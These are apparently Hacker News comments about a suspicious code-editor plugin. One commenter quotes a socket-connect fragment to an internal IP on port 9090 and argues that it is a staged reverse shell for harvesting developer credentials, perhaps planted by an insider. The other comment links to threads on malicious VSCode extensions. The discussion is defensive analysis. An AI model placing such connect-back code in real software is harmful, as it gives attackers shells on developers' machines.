Interesting that there's a comment in the article's comments that talks about the<p>> client_sock. connect (9090, "192.168.71.132", () → { ...<p>And then goes on to say that it mostly looks innocent. Except to me, that makes me think that this code is probably aimed at a specific target where they've already hacked one internal box, but there's not much interesting they can get from that box directly, but are now using it as a proxy to try to get a command prompt on developers machines where it's more likely there will be random passwords and configuration data that could be harvested.<p>It could even feasibly point to someone who's already employed by the victim company who knows that plugin is used by developers with more access credentials than they have, and are trying to extract them without anything pointing to them. At some point in the future, they could just add that IP to their box that's already in the target network and bingo shells on their victims machines would start appearing.
See also:<p><a href="https://news.ycombinator.com/item?id=40624000">https://news.ycombinator.com/item?id=40624000</a> - We Hacked Multi-Billion $ Companies in 30 Minutes with a VSCode Extension<p><a href="https://news.ycombinator.com/item?id=40624855">https://news.ycombinator.com/item?id=40624855</a> - Malicious VSCode extensions with installs discovered